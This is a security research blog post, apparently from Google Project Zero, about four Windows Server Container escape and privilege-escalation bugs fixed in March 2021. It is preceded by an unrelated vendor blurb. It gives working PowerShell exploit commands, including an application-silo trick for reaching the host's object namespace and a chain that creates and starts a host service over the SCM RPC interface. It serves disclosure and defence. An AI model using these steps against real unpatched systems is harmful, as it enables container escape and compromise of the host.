ZecOps develops the world’s most powerful platform to discover and analyze mobile cyber attacks. Used by world-leading governments, enterprises, and individuals globally, ZecOps Mobile EDR provides a realistic and scalable approach to mobile threat hunting. ZecOps enables automated discovery of 0-day attacks and Advanced Persistent Threats (APTs), delivering anti cyber-espionage capabilities within minutes. Headquartered in San Francisco, ZecOps was co-founded by Zuk Avraham, a security researcher and serial entrepreneur who previously founded Zimperium.  

For more information: https://www.zecops.com 

Follow ZecOps: LinkedIn | Twitter | Facebook

ZecOps Media Contact:

[email protected]

Who Contains the Containers?

By: Ryan
1 April 2021 at 16:06

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

Diagram of a server silo. Shows an application interacting with the registry, object manager and network and how being in the silo redirects that access to another location.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

Diagram comparing Windows Server Containers and Hyper-V Isolated Containers. The server container on the left directly accesses the hosts kernel. For Hyper-V the container accesses a virtualized kernel, which dispatches to the hypervisor and then back to the original host kernel. This shows the additional security boundary in place to make Hyper-V isolated containers more secure.

The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done easier without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.

Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use Docker which takes the MS provided Go wrapper and implements the more familiar Docker CLI. While there’s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise which is only for server systems and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:

FROM mcr.microsoft.com/windows/servercore:20H2

USER ContainerUser

COPY NtObjectManager c:/NtObjectManager

CMD [ "powershell", "-noexit", "-command", \

  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy in a copy of my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.

C:\container> docker build -t test_image .

Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2

 ---> b29adf5cd4f0

Step 2/4 : USER ContainerUser

 ---> Running in ac03df015872

Removing intermediate container ac03df015872

 ---> 31b9978b5f34

Step 3/4 : COPY NtObjectManager c:/NtObjectManager

 ---> fa42b3e6a37f

Step 4/4 : CMD [ "powershell", "-noexit", "-command",   "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

 ---> Running in 86cad2271d38

Removing intermediate container 86cad2271d38

 ---> e7d150417261

Successfully built e7d150417261

Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image

PS>

I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName

-------  ------    -----      -----     ------     --  -- -----------

     86       6     1044       5020              4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.

PS> Show-NtTokenEffective -User -Group -Privilege

USER INFORMATION

----------------

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION

-----------------

Name                                   Attributes

----                                   ----------

Mandatory Label\High Mandatory Level   Integrity, ...

Everyone                               Mandatory, ...

BUILTIN\Users                          Mandatory, ...

NT AUTHORITY\SERVICE                   Mandatory, ...

CONSOLE LOGON                          Mandatory, ...

NT AUTHORITY\Authenticated Users       Mandatory, ...

NT AUTHORITY\This Organization         Mandatory, ...

NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...

LOCAL                                  Mandatory, ...

User Manager\AllContainers             Mandatory, ...

PRIVILEGE INFORMATION

---------------------

Name                          Luid              Enabled

----                          ----              -------

SeChangeNotifyPrivilege       00000000-00000017 True

SeImpersonatePrivilege        00000000-0000001D True

SeCreateGlobalPrivilege       00000000-0000001E True

SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be.

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

NextI used the NtObject drive provider to list the object manager namespace. For example checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device

Name                                              TypeName

----                                              --------

Ip                                                SymbolicLink

Tcp6                                              SymbolicLink

Http                                              Directory

Ip6                                               SymbolicLink

ahcache                                           SymbolicLink

WMIDataDevice                                     SymbolicLink

LanmanDatagramReceiver                            SymbolicLink

Tcp                                               SymbolicLink

LanmanRedirector                                  SymbolicLink

DxgKrnl                                           SymbolicLink

ConDrv                                            SymbolicLink

Null                                              SymbolicLink

MailslotRedirector                                SymbolicLink

NamedPipe                                         Device

Udp6                                              SymbolicLink

VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink

KsecDD                                            SymbolicLink

DeviceApi                                         SymbolicLink

MountPointManager                                 Device

...

Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name

Name

----

HKEY_LOCAL_MACHINE\SOFTWARE\Classes

HKEY_LOCAL_MACHINE\SOFTWARE\Clients

HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft

HKEY_LOCAL_MACHINE\SOFTWARE\ODBC

HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH

HKEY_LOCAL_MACHINE\SOFTWARE\Policies

HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications

HKEY_LOCAL_MACHINE\SOFTWARE\Setup

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name

Name

----

Classes

Clients

DefaultUserEnvironment

Docker Inc.

Intel

Macromedia

Microsoft

ODBC

OEM

OpenSSH

Partner

Policies

RegisteredApplications

Windows

WOW6432Node

The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name

Name

----

.DEFAULT

S-1-5-19

S-1-5-20

S-1-5-21-426062036-3400565534-2975477557-1001

S-1-5-21-426062036-3400565534-2975477557-1001_Classes

S-1-5-21-426062036-3400565534-2975477557-1003

S-1-5-18

PS> Get-NtSid

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.

The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.

The main enforcement mechanism used by the kernel to provide the container’s isolation is by calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong, the following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {

  if (PsIsCurrentThreadInServerSilo() 

    || !TargetHive

    || TargetHive == SourceHive) {

    return TRUE;

  }

  if (SourceHive->Flags.Trusted)

    return FALSE;

  // Check trust list.

}

Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.

POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {

  if (Silo) {

    PPSP_STORAGE Storage = Silo->Storage;

    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];

    if (Slot->Present)

      return Slot->Value;

  }

  return ObpRootDirectoryObject;

}

We can see that the function will extract a storage parameter from the passed-in silo, if present it will return the value of the slot. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code.

PEJOB silo = PsGetCurrentSilo();

Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);

Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {

  PETHREAD Thread = PsGetCurrentThread();

  PEJOB silo = Thread->Silo;

  if (silo == (PEJOB)-3) {

    silo = Thread->Tcb.Process->Job;

    while(silo) {

      if (silo->JobFlags & EJOB_SILO) {

        break;

      }

      silo = silo->ParentJob;

    }

  }

  return silo;

}

A silo can be associated with a thread, through impersonation or as can be one job in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches for any job in the job hierarchy for the process for anything which has the JOB_SILO flag set. If a silo is found, it’s returned from the function, otherwise NULL would be returned.

This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager to using the root directory all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"

PS> $root.FullPath

\

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> $root.FullPath

\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the root root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container as the system volume for the container is an accessible device on the host we can just access.

As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container’s SCM, not the hosts.

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()

PS> $sym_path = "$env:SystemDrive\symbols"

PS> mkdir $sym_path | Out-Null

PS> $services_path = "$env:SystemRoot\system32\services.exe"

PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'

# You can also use the following to run a container based executable.

#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {

#   "\\.\GLOBALROOT" + $f.FullPath

#}

PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path

PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | 

   Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'

PS> $client = Get-RpcClient $rpc

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> Connect-RpcClient $client -EndpointPath ntsvcs

PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `

 [NullString]::Value, `

 [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)

PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `

 [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `

 [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)

PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120 which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.

After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.

Conclusions

The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.

❌
❌